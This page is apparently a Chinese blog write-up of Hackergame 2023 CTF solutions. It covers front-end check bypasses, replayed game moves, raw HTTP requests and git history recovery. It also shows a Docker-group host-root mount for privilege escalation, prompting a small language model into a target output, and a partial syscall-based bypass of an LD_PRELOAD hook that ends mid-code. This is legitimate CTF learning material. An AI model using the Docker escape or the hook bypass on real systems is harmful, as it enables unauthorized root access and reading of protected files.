<!DOCTYPE HTML>
<html>
<head>
  <meta charset="utf-8">
  <meta http-equiv="pragma" content="no-cache">
  <meta http-equiv="cache-control" content="no-cache">
  <meta http-equiv="expires" content="0">
  
  <title>Hackergame2023 | nyyyddddn</title>
  <meta name="author" content="nyyyddddn">
  
  <meta name="description" content="Hackergame 启动Hackergame启动！发现校验相似度是在前端校验的，然后通过url传参相似度，传递个100过去就拿到flag了
更深更暗在main.js里有一段生成flag的代码，在控制台中调用就好了
async function getFlag(token) &amp;#123;
    // Generate the flag based on user&#39;s token
    let hash = CryptoJS.SHA256(`dEEper_@nd_d@rKer_$&amp;#123;token&amp;#125;`).toString();
    return `flag&amp;#123;T1t@n_$&amp;#123;hash.slice(0, 32)&amp;#125;&amp;#125;`;
&amp;#125;

async function getFlag(token) &amp;#123;
        // Generate the flag based on user&#39;s token
        let hash = CryptoJS.SHA256(`dEEper_@nd_d@rKer_$&amp;#123;token&amp;#125;`).toString();
        return `flag&amp;#123;T1t@n_$&amp;#123;hash.slice(0, 32)&amp;#125;&amp;#125;`;
    &amp;#125;
getFlag(localStorage.token)



猫咪小测
1. 想要借阅世界图书出版公司出版的《A Classical Introduction To Modern Number Theory 2nd ed.》，应当前往中国科学技术大学西区图书馆的哪一层？（30 分）
12
暴力破解

2. 今年 arXiv 网站的天体物理版块上有人发表了一篇关于「可观测宇宙中的鸡的密度上限」的论文，请问论文中作者计算出的鸡密度函数的上限为 10 的多少次方每立方秒差距？（30 分）
23

https:&amp;#x2F;&amp;#x2F;arxiv.org&amp;#x2F;abs&amp;#x2F;2303.17626


3. 为了支持 TCP BBR 拥塞控制算法，在编译 Linux 内核时应该配置好哪一条内核选项？
CONFIG_TCP_CONG_BBR

https:&amp;#x2F;&amp;#x2F;github.com&amp;#x2F;google&amp;#x2F;bbr&amp;#x2F;blob&amp;#x2F;master&amp;#x2F;Documentation&amp;#x2F;bbr-quick-start.md


4. 🥒🥒🥒：「我……从没觉得写类型标注有意思过」。在一篇论文中，作者给出了能够让 Python 的类型检查器 MyPY mypy 陷入死循环的代码，并证明 Python 的类型检查和停机问题一样困难。请问这篇论文发表在今年的哪个学术会议上？（20 分）
提示：会议的大写英文简称，比如 ISCA、CCS、ICML。

ECOOP
https:&amp;#x2F;&amp;#x2F;drops.dagstuhl.de&amp;#x2F;opus&amp;#x2F;volltexte&amp;#x2F;2023&amp;#x2F;18237&amp;#x2F;pdf&amp;#x2F;LIPIcs-ECOOP-2023-44.pdf


好耶学会怎么搜索论文了,Google hacker语法，萃取关键词，然后按时间筛选缩小范围"> 
  
  
  <meta name="viewport" content="width=device-width, initial-scale=1, maximum-scale=1">

  <meta property="og:title" content="Hackergame2023"/>
  <meta property="og:site_name" content="nyyyddddn"/>

  
    <meta property="og:image" content=""/>
  

  
    <link rel="alternative" href="/atom.xml" title="nyyyddddn" type="application/atom+xml">
  
  
    <link href="/favicon.png" rel="icon">
  
  
  <link rel="stylesheet" href="/css/bootstrap.min.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/font-awesome.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/style.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/responsive.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/highlight.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/prism.css" media="screen" type="text/css">
  <link rel="stylesheet" href="/css/google-fonts.css" media="screen" type="text/css">
  <!--[if lt IE 9]><script src="//html5shiv.googlecode.com/svn/trunk/html5.js"></script><![endif]-->

  <script src="/js/jquery-2.0.3.min.js"></script>

  <!-- analytics -->
  




<meta name="generator" content="Hexo 6.3.0"></head>

 <body>  
  <nav id="main-nav" class="navbar navbar-inverse navbar-fixed-top" role="navigation">
    <div class="container">
      <button type="button" class="navbar-header navbar-toggle" data-toggle="collapse" data-target=".navbar-collapse">
		<span class="sr-only">Toggle navigation</span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
        <span class="icon-bar"></span>
      </button>
	  <a class="navbar-brand" href="/">nyyyddddn</a>
      <div class="collapse navbar-collapse nav-menu">
		<ul class="nav navbar-nav">
		  
		  <li>
			<a href="/archives" title="All the articles.">
			  <i class=""></i>Archives
			</a>
		  </li>
		  
		  <li>
			<a href="/catergories" title="All the categories.">
			  <i class=""></i>Categories
			</a>
		  </li>
		  
		  <li>
			<a href="/tags" title="All the tags.">
			  <i class=""></i>Tags
			</a>
		  </li>
		  
		  <li>
			<a href="/about" title="About me.">
			  <i class=""></i>About
			</a>
		  </li>
		  
		  <li>
			<a href="/atom.xml" title="Subscribe me.">
			  <i class=""></i>RSS
			</a>
		  </li>
		  
		</ul>
      </div>
    </div> <!-- container -->
</nav>
<div class="clearfix"></div>

  <div class="container">
  	<div class="content">
    	 


	
		<div class="page-header">
			<h1> Hackergame2023</h1>
		</div>
	



<div class="row post">
	<!-- cols -->
	
	<div id="top_meta"></div>
	<div class="col-md-9">
	

	<!-- content -->
	<div class="mypage">		
	  		

	  <h2 id="Hackergame-启动"><a href="#Hackergame-启动" class="headerlink" title="Hackergame 启动"></a>Hackergame 启动</h2><p>Hackergame启动！发现校验相似度是在前端校验的，然后通过url传参相似度，传递个100过去就拿到flag了</p>
<h2 id="更深更暗"><a href="#更深更暗" class="headerlink" title="更深更暗"></a>更深更暗</h2><p>在main.js里有一段生成flag的代码，在控制台中调用就好了</p>
<pre class="line-numbers language-javascript" data-language="javascript"><code class="language-javascript"><span class="token keyword">async</span> <span class="token keyword">function</span> <span class="token function">getFlag</span><span class="token punctuation">(</span><span class="token parameter">token</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token comment">// Generate the flag based on user's token</span>
    <span class="token keyword">let</span> hash <span class="token operator">=</span> CryptoJS<span class="token punctuation">.</span><span class="token constant">SHA256</span><span class="token punctuation">(</span><span class="token template-string"><span class="token template-punctuation string">`</span><span class="token string">dEEper_@nd_d@rKer_</span><span class="token interpolation"><span class="token interpolation-punctuation punctuation">$&#123;</span>token<span class="token interpolation-punctuation punctuation">&#125;</span></span><span class="token template-punctuation string">`</span></span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">toString</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
    <span class="token keyword">return</span> <span class="token template-string"><span class="token template-punctuation string">`</span><span class="token string">flag&#123;T1t@n_</span><span class="token interpolation"><span class="token interpolation-punctuation punctuation">$&#123;</span>hash<span class="token punctuation">.</span><span class="token function">slice</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> <span class="token number">32</span><span class="token punctuation">)</span><span class="token interpolation-punctuation punctuation">&#125;</span></span><span class="token string">&#125;</span><span class="token template-punctuation string">`</span></span><span class="token punctuation">;</span>
<span class="token punctuation">&#125;</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-javascript" data-language="javascript"><code class="language-javascript"><span class="token keyword">async</span> <span class="token keyword">function</span> <span class="token function">getFlag</span><span class="token punctuation">(</span><span class="token parameter">token</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
        <span class="token comment">// Generate the flag based on user's token</span>
        <span class="token keyword">let</span> hash <span class="token operator">=</span> CryptoJS<span class="token punctuation">.</span><span class="token constant">SHA256</span><span class="token punctuation">(</span><span class="token template-string"><span class="token template-punctuation string">`</span><span class="token string">dEEper_@nd_d@rKer_</span><span class="token interpolation"><span class="token interpolation-punctuation punctuation">$&#123;</span>token<span class="token interpolation-punctuation punctuation">&#125;</span></span><span class="token template-punctuation string">`</span></span><span class="token punctuation">)</span><span class="token punctuation">.</span><span class="token function">toString</span><span class="token punctuation">(</span><span class="token punctuation">)</span><span class="token punctuation">;</span>
        <span class="token keyword">return</span> <span class="token template-string"><span class="token template-punctuation string">`</span><span class="token string">flag&#123;T1t@n_</span><span class="token interpolation"><span class="token interpolation-punctuation punctuation">$&#123;</span>hash<span class="token punctuation">.</span><span class="token function">slice</span><span class="token punctuation">(</span><span class="token number">0</span><span class="token punctuation">,</span> <span class="token number">32</span><span class="token punctuation">)</span><span class="token interpolation-punctuation punctuation">&#125;</span></span><span class="token string">&#125;</span><span class="token template-punctuation string">`</span></span><span class="token punctuation">;</span>
    <span class="token punctuation">&#125;</span>
<span class="token function">getFlag</span><span class="token punctuation">(</span>localStorage<span class="token punctuation">.</span>token<span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>



<h2 id="猫咪小测"><a href="#猫咪小测" class="headerlink" title="猫咪小测"></a>猫咪小测</h2><pre class="line-numbers language-none"><code class="language-none">
1. 想要借阅世界图书出版公司出版的《A Classical Introduction To Modern Number Theory 2nd ed.》，应当前往中国科学技术大学西区图书馆的哪一层？（30 分）
12
暴力破解

2. 今年 arXiv 网站的天体物理版块上有人发表了一篇关于「可观测宇宙中的鸡的密度上限」的论文，请问论文中作者计算出的鸡密度函数的上限为 10 的多少次方每立方秒差距？（30 分）
23

https:&#x2F;&#x2F;arxiv.org&#x2F;abs&#x2F;2303.17626


3. 为了支持 TCP BBR 拥塞控制算法，在编译 Linux 内核时应该配置好哪一条内核选项？
CONFIG_TCP_CONG_BBR

https:&#x2F;&#x2F;github.com&#x2F;google&#x2F;bbr&#x2F;blob&#x2F;master&#x2F;Documentation&#x2F;bbr-quick-start.md


4. 🥒🥒🥒：「我……从没觉得写类型标注有意思过」。在一篇论文中，作者给出了能够让 Python 的类型检查器 MyPY mypy 陷入死循环的代码，并证明 Python 的类型检查和停机问题一样困难。请问这篇论文发表在今年的哪个学术会议上？（20 分）
提示：会议的大写英文简称，比如 ISCA、CCS、ICML。

ECOOP
https:&#x2F;&#x2F;drops.dagstuhl.de&#x2F;opus&#x2F;volltexte&#x2F;2023&#x2F;18237&#x2F;pdf&#x2F;LIPIcs-ECOOP-2023-44.pdf


好耶学会怎么搜索论文了,Google hacker语法，萃取关键词，然后按时间筛选缩小范围<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<img src="/2023/12/28/hackergame2023/1698678184780.png" class="">

<img src="/2023/12/28/hackergame2023/1698678163552.png" class="">

<h2 id="赛博井字棋"><a href="#赛博井字棋" class="headerlink" title="赛博井字棋"></a>赛博井字棋</h2><p>简单玩了一下，发现怎么打都是平局，后面在想能不能在敌方棋子位置下棋，用burp suite发送了一下，发现可以，后端没有判断格子上面是否有棋子，覆盖敌方棋子后就拿到flag了，也可以用两个浏览器来操作</p>
<img src="/2023/12/28/hackergame2023/1698666436520.png" class="">

<pre class="line-numbers language-none"><code class="language-none">flag&#123;I_can_eat_your_pieces_41065ba433&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h2 id="组委会模拟器"><a href="#组委会模拟器" class="headerlink" title="组委会模拟器"></a>组委会模拟器</h2><p>这道题消息都是在span标签中的，只需要把span枚举一次，用正则匹配，然后再模拟点击就好了</p>
<pre class="line-numbers language-none"><code class="language-none">function findAndClickSpan() &#123;

  const regex &#x3D; &#x2F;hack\[[^\]]*\]&#x2F;;

  const spans &#x3D; document.getElementsByTagName(&#39;span&#39;);

  Array.from(spans).forEach((span) &#x3D;&gt; &#123;
    if (regex.test(span.textContent)) &#123;
      console.log(&#39;匹配的span元素:&#39;, span);

      span.click();
    &#125;
  &#125;);
&#125;
setInterval(findAndClickSpan, 1000);<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">flag&#123;Web_pr0gra_mm1ng_5a17e089a1_15fun&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h2 id="虫"><a href="#虫" class="headerlink" title="虫"></a>虫</h2><p>查询了一下无线传输图片的方法，sstv这个协议</p>
<p><a target="_blank" rel="noopener" href="https://mp.weixin.qq.com/s?__biz=MzU3ODc2NTg1OA==&mid=2247485349&idx=1&sn=7bdfed472158dc2378113361ee9556a6&chksm=fd7112e8ca069bfe1b3da839050f8bebc5c1c166ac82f3326e634779ce1f55f45897968c9922&token=9197758&lang=zh_CN#rd">https://mp.weixin.qq.com/s?__biz=MzU3ODc2NTg1OA==&amp;mid=2247485349&amp;idx=1&amp;sn=7bdfed472158dc2378113361ee9556a6&amp;chksm=fd7112e8ca069bfe1b3da839050f8bebc5c1c166ac82f3326e634779ce1f55f45897968c9922&amp;token=9197758&amp;lang=zh_CN#rd</a></p>
<p>可以用rx sstv这个软件还原图片，需要先装个虚拟声卡然后用rx sstv监听，还原就好了</p>
<img src="/2023/12/28/hackergame2023/1698661030342.png" class="">

<pre class="line-numbers language-none"><code class="language-none">flag&#123;SSssTV_y0u_W4NNa_HaV3_4_trY&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h2 id="HTTP-集邮册-差一个"><a href="#HTTP-集邮册-差一个" class="headerlink" title="HTTP 集邮册[差一个]"></a>HTTP 集邮册[差一个]</h2><p>1 获取第一个 flag 需要收集 5 种状态码；</p>
<p>1 200 get请求一个存在的目录 </p>
<p>2 400 请求格式错误 随便乱输入一些东西</p>
<p>3 404 请求一个不存在的目录 </p>
<p>4  405 Bad Request 服务器那边不支持post，直接post</p>
<pre class="line-numbers language-none"><code class="language-none">POST &#x2F; HTTP&#x2F;1.1\r\n
Host: example.com\r\n\r\n<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>5 505 http版本不受支持</p>
<pre class="line-numbers language-none"><code class="language-none">GET &#x2F; HTTP&#x2F;10.1\r\n
Host: example.com\r\n\r\n<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<p>2  nginx 返回首行无状态码的响应（不计入收集的状态码中）；</p>
<p>只要不带上http的版本号，服务器那边就不会相应状态相关的信息</p>
<pre class="line-numbers language-none"><code class="language-none">GET &#x2F; \r\n
Host: example.com\r\n\r\n<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">flag&#123;d1d you hear the HTTP packet from 1991?&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>草，这个flag</p>
<h2 id="Git-Git"><a href="#Git-Git" class="headerlink" title="Git? Git!"></a>Git? Git!</h2><p>不太熟悉git，在搜索后发现，撤销这个操作本身也算是一个提交，也会记录到日志当中，然后我去翻了下项目文件，发现log文件下有一个reset的操作，这里应该是指”撤销”吧，查询了一会资料后发现有一个git show hash的命令，可以查看这个操作具体做了什么事情</p>
<pre class="line-numbers language-none"><code class="language-none">0000000000000000000000000000000000000000 15fd0a13eb46c39f34cfc0dfb4757ad23a23d026 PRO-2684 &lt;54608551+PRO-2684@users.noreply.github.com&gt; 1698306875 +0800	clone: from https:&#x2F;&#x2F;github.com&#x2F;dair-ai&#x2F;ML-Course-Notes.git
15fd0a13eb46c39f34cfc0dfb4757ad23a23d026 505e1a3f446c23f31807a117e860f57cb5b5bb79 some_english_postgraduate &lt;some_english_postgraduate@none-exist.com&gt; 1698307060 +0800	commit: Trim trailing spaces
505e1a3f446c23f31807a117e860f57cb5b5bb79 15fd0a13eb46c39f34cfc0dfb4757ad23a23d026 some_english_postgraduate &lt;some_english_postgraduate@none-exist.com&gt; 1698307092 +0800	reset: moving to HEAD~
15fd0a13eb46c39f34cfc0dfb4757ad23a23d026 ea49f0cd3d36edb2965f89581b11151959d20991 some_english_postgraduate &lt;some_english_postgraduate@none-exist.com&gt; 1698307103 +0800	commit: Trim trailing spaces<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">git show 505e1a3f446c23f31807a117e860f57cb5b5bb79<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>后找到撤销的flag</p>
<pre class="line-numbers language-none"><code class="language-none">flag&#123;TheRe5_@lwAy5_a_R3GreT_pi1l_1n_G1t&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h2 id="Docker-for-Everyone"><a href="#Docker-for-Everyone" class="headerlink" title="Docker for Everyone"></a>Docker for Everyone</h2><p>X 是实验室机器的管理员，为了在保证安全的同时让同学们都用上 docker，他把同学的账号加入了 docker 用户组，这样就不需要给同学 sudo 权限了！</p>
<p>但果真如此吗？</p>
<p>去查询了一下后发现，Docker守护程序的访问权限是没有限制的，在docker容器中，可以具有和宿主机相同的权限，那能不能把flag给搬到容器里面，查询了一下后发现有一条挂载数据卷的命令可以实现这个操作</p>
<pre class="line-numbers language-none"><code class="language-none">docker run -v &#x2F;:&#x2F;tmp&#x2F; -it alpine &#x2F;bin&#x2F;sh<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>cat flag发现有些问题，ls -al看了下是一个软链接，进到这个链接的目录下cat flag</p>
<pre class="line-numbers language-none"><code class="language-none">&#x2F;tmp&#x2F;dev&#x2F;shm # cat flag<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>得到flag</p>
<pre class="line-numbers language-none"><code class="language-none">flag&#123;u5e_r00t1ess_conta1ner_1d94c2e3ce_plz!&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h2 id="JSON-⊂-YAML"><a href="#JSON-⊂-YAML" class="headerlink" title="JSON ⊂ YAML?"></a>JSON ⊂ YAML?</h2><p>第一问</p>
<p>根据这段话，可以分析出第一问的本质是在问yaml1.1和yaml1.2有什么区别，去学习了一下yaml，和json有些相似，由键值对，列表，还有块三种结构组合成的一种组织数据的语言。</p>
<pre class="line-numbers language-none"><code class="language-none">小 Z 听闻这番言论后当场表示怀疑，立刻说出了一个字符串，JSON 和 YAML 解析出的含义存在差异。小 W 研究了一番才发现，这是因为很多主流的 YAML 库仍然是 YAML 1.1 的，它没有这个性质。他不得不承认：「好吧，这个性质只适用于 YAML 1.2。」<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p><a target="_blank" rel="noopener" href="https://stackoverflow.com/questions/21584985/what-valid-json-files-are-not-valid-yaml-1-1-files">https://stackoverflow.com/questions/21584985/what-valid-json-files-are-not-valid-yaml-1-1-files</a></p>
<p>可以参考这篇文章，咱的payload是</p>
<pre class="line-numbers language-none"><code class="language-none">123e100000<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>在yaml1.1中，这个表达式会被解析成科学计数法，json中会被解析成字符串</p>
<p>第二问</p>
<p>搜了半天，终于搜到解决方法了</p>
<img src="/2023/12/28/hackergame2023/1699069440559.png" class="">

<pre class="line-numbers language-none"><code class="language-none">&#123;&quot;name&quot;: &quot;John Doe&quot;, &quot;age&quot;: 25, &quot;name&quot;: &quot;Jonathan Doe&quot;&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>





<h2 id="奶奶的睡前-flag-故事"><a href="#奶奶的睡前-flag-故事" class="headerlink" title="奶奶的睡前 flag 故事"></a>奶奶的睡前 flag 故事</h2><p>咱是笨蛋，去问了newbing好久，后面用010edit打开后发现有两个iend尾，然后联想到系统都没有心思升级，截图，谷歌亲儿子这些关键词，联想到截图漏洞，尾部的像素块没有被截断</p>
<p>去搜索了一下发现这个网站可以还原图片</p>
<p><a target="_blank" rel="noopener" href="https://acropalypse.app/">https://acropalypse.app/</a></p>
<img src="/2023/12/28/hackergame2023/1698743242612.png" class="">

<img src="/2023/12/28/hackergame2023/1698743440800.png" class="">



<h2 id="🪐-高频率星球"><a href="#🪐-高频率星球" class="headerlink" title="🪐 高频率星球"></a>🪐 高频率星球</h2><p><a target="_blank" rel="noopener" href="https://asciinema.org/">asciinema</a></p>
<p>这个软件录制的文件，把录制的文件导出来，发现是一个js的文件，尾部显示运行这个文件能得到flag，但是录制出来的文件有太多终端颜色的符号还有切页符号</p>
<pre class="line-numbers language-none"><code class="language-none">asciienma cat xxxx &gt; output.txt<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">\033\[[\x30-\x3f]*[\x40-\x7e]<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<p>用这个正则清理掉大多数符号后，手工清理了一下，然后拿到flag</p>
<pre class="line-numbers language-none"><code class="language-none">node output.js<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">flag&#123;y0u_cAn_ReSTorE_C0de_fr0m_asc11nema_3db2da1063300e5dabf826e40ffd016101458df23a371&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>



<h2 id="🪐-低带宽星球-差一个"><a href="#🪐-低带宽星球-差一个" class="headerlink" title="🪐 低带宽星球[差一个]"></a>🪐 低带宽星球[差一个]</h2><p>压缩至 2KiB (2048 字节) 及以下、</p>
<p><a target="_blank" rel="noopener" href="https://github.com/meowtec/Imagine">https://github.com/meowtec/Imagine</a> 这个项目能压缩图片到2kb以下，提交图片后获得flag</p>
<pre class="line-numbers language-none"><code class="language-none">flag&#123;A1ot0f_t0015_is_available_to_compre55_PNG&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>





<h2 id="🪐-流式星球"><a href="#🪐-流式星球" class="headerlink" title="🪐 流式星球"></a>🪐 流式星球</h2><p>这道题的难点有两个，一个是不知道宽高，原始宽高不是10的倍数，以及有个随机数切片，很容易想到质因数分解，然后爆破一百次，把所有可能都试一遍，但是结果都不太行，手工试了一下，找出三个能看出规整图形的尺寸，640 * 620 1280 * 768 2560 * 1440，能看到规整图形了，发现是bang dream it’s mygo的视频，flag在字幕的位置，第二个难点是flag每帧都有随机一行被混淆，然后字体的原因flag看不太清楚，最后把相似的数字枚举了了一遍，才拿到flag</p>
<pre class="line-numbers language-none"><code class="language-none">import cv2
import numpy as np
import os


def restore_video(input_file, output_folder, frame_width, frame_height):

    with open(input_file, &quot;rb&quot;) as f:
        buffer &#x3D; np.fromfile(f, dtype&#x3D;np.uint8)

    if len(buffer) % 3 !&#x3D; 0:
        buffer &#x3D; buffer[:-(len(buffer) % 3)]

    missing_pixels &#x3D; (frame_width * frame_height * 3) - (len(buffer) % (frame_width * frame_height * 3))
    buffer &#x3D; np.concatenate([buffer, np.zeros(missing_pixels, dtype&#x3D;np.uint8)])

    frame_count &#x3D; len(buffer) &#x2F;&#x2F; (frame_width * frame_height * 3)
    buffer &#x3D; buffer.reshape((frame_count, frame_height, frame_width, 3))

    if not os.path.exists(output_folder):
        os.makedirs(output_folder)

    for i in range(frame_count):
        frame &#x3D; buffer[i].astype(np.uint8)
        filename &#x3D; os.path.join(output_folder, f&quot;frame_&#123;i:04d&#125;.png&quot;)
        cv2.imwrite(filename, frame)


if __name__ &#x3D;&#x3D; &quot;__main__&quot;:
    restore_video(&quot;video.bin&quot;, &quot;output_frames&quot;, 640, 620)
<span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<pre class="line-numbers language-none"><code class="language-none">flag&#123;it-could-be-easy-to-restore-video-with-haruhikage-even-without-metadata-0F7968CC&#125;<span aria-hidden="true" class="line-numbers-rows"><span></span></span></code></pre>





<h2 id="🪐-小型大语言模型星球"><a href="#🪐-小型大语言模型星球" class="headerlink" title="🪐 小型大语言模型星球"></a>🪐 小型大语言模型星球</h2><p>you are smart</p>
<p>qaq这个模型太笨了，试了好多句子才试出来了</p>
<img src="/2023/12/28/hackergame2023/1699000096270.png" class="">



<h2 id="为什么要打开-flag-😡-差一个"><a href="#为什么要打开-flag-😡-差一个" class="headerlink" title="为什么要打开 &#x2F;flag 😡[差一个]"></a>为什么要打开 &#x2F;flag 😡[差一个]</h2><p>好耶，在hackergame上第一个binary题</p>
<h3 id="LD-PRELOAD"><a href="#LD-PRELOAD" class="headerlink" title="LD_PRELOAD"></a>LD_PRELOAD</h3><p>去搜索了一下什么是ld_preload，ld_preload是linux上的一个环境变量，程序运行的时候根据ld_preload选择使用什么动态链接库</p>
<p>这里使用了&#x2F;stage1.so 这个动态链接库</p>
<pre class="line-numbers language-python" data-language="python"><code class="language-python"><span class="token keyword">import</span> subprocess
<span class="token keyword">import</span> base64
<span class="token keyword">import</span> os

STAGE <span class="token operator">=</span> os<span class="token punctuation">.</span>environ<span class="token punctuation">[</span><span class="token string">"STAGE"</span><span class="token punctuation">]</span>
<span class="token keyword">assert</span> STAGE <span class="token keyword">in</span> <span class="token punctuation">(</span><span class="token string">"1"</span><span class="token punctuation">,</span> <span class="token string">"2"</span><span class="token punctuation">)</span>

<span class="token keyword">if</span> __name__ <span class="token operator">==</span> <span class="token string">"__main__"</span><span class="token punctuation">:</span>
    binary <span class="token operator">=</span> <span class="token builtin">input</span><span class="token punctuation">(</span><span class="token string">"Base64 of binary: "</span><span class="token punctuation">)</span>
    <span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">"/dev/shm/executable"</span><span class="token punctuation">,</span> <span class="token string">"wb"</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
        f<span class="token punctuation">.</span>write<span class="token punctuation">(</span>base64<span class="token punctuation">.</span>b64decode<span class="token punctuation">(</span>binary<span class="token punctuation">)</span><span class="token punctuation">)</span>
    <span class="token keyword">with</span> <span class="token builtin">open</span><span class="token punctuation">(</span><span class="token string">"/dev/shm/executable"</span><span class="token punctuation">,</span> <span class="token string">"rb"</span><span class="token punctuation">)</span> <span class="token keyword">as</span> f<span class="token punctuation">:</span>
        <span class="token keyword">if</span> f<span class="token punctuation">.</span>read<span class="token punctuation">(</span><span class="token number">4</span><span class="token punctuation">)</span> <span class="token operator">!=</span> <span class="token string">b"\x7fELF"</span><span class="token punctuation">:</span>
            <span class="token keyword">print</span><span class="token punctuation">(</span><span class="token string">"不是 ELF 文件"</span><span class="token punctuation">)</span>
            exit<span class="token punctuation">(</span><span class="token number">1</span><span class="token punctuation">)</span>
    os<span class="token punctuation">.</span>chmod<span class="token punctuation">(</span><span class="token string">"/dev/shm/executable"</span><span class="token punctuation">,</span> <span class="token number">0o555</span><span class="token punctuation">)</span>
    <span class="token keyword">if</span> STAGE <span class="token operator">==</span> <span class="token string">"1"</span><span class="token punctuation">:</span>
        output <span class="token operator">=</span> subprocess<span class="token punctuation">.</span>run<span class="token punctuation">(</span>
            <span class="token punctuation">[</span><span class="token string">"/dev/shm/executable"</span><span class="token punctuation">]</span><span class="token punctuation">,</span>
            stdin<span class="token operator">=</span>subprocess<span class="token punctuation">.</span>DEVNULL<span class="token punctuation">,</span>
            stdout<span class="token operator">=</span>subprocess<span class="token punctuation">.</span>PIPE<span class="token punctuation">,</span>
            stderr<span class="token operator">=</span>subprocess<span class="token punctuation">.</span>PIPE<span class="token punctuation">,</span>
            user<span class="token operator">=</span><span class="token string">"nobody"</span><span class="token punctuation">,</span>
            group<span class="token operator">=</span><span class="token string">"nogroup"</span><span class="token punctuation">,</span>
            env<span class="token operator">=</span><span class="token punctuation">&#123;</span>
                <span class="token string">"LD_PRELOAD"</span><span class="token punctuation">:</span> <span class="token string">"/stage1.so"</span>
            <span class="token punctuation">&#125;</span>
        <span class="token punctuation">)</span><span aria-hidden="true" class="line-numbers-rows"><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span><span></span></span></code></pre>

<p>大概看了一遍stage1.so，发现和io相关的操作和io不相关但是能间接读flag的函数都被hook了，要么是return一个fake flag要么是 return 0，想了各种的方法，后面突然联想到这些io的操作本质上不就是系统调用吗，那我用内联汇编，去syscall，模拟这些读的操作不就好了</p>
<pre class="line-numbers language-c" data-language="c"><code class="language-c"><span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;unistd.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;sys/syscall.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;sys/types.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdio.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;stdlib.h></span></span>
<span class="token macro property"><span class="token directive-hash">#</span><span class="token directive keyword">include</span> <span class="token string">&lt;fcntl.h></span></span>

<span class="token keyword">int</span> <span class="token function">main</span><span class="token punctuation">(</span><span class="token punctuation">)</span> <span class="token punctuation">&#123;</span>
    <span class="token keyword">int</span> fd<span class="token punctuation">;</span>
    <span class="token class-name">ssize_t</span> nread<span class="token punctuation">;</span>
    <span class="token keyword">char</span> buf<span class="token punctuation">[</span><span class="token number">1024</span><span class="token punctuation">]</span><span class="token punctuation">;</span>

    <span class="token comment">// 使用系统调用打开文件</span>
    <span class="token keyword">asm</span><span class="token punctuation">(</span><span class="token string">"syscall"</span>
        <span class="token operator">:</span> <span class="token string">"=a"</span> <span class="token punctuation">(</span>fd<span class="token punctuation">)</span>
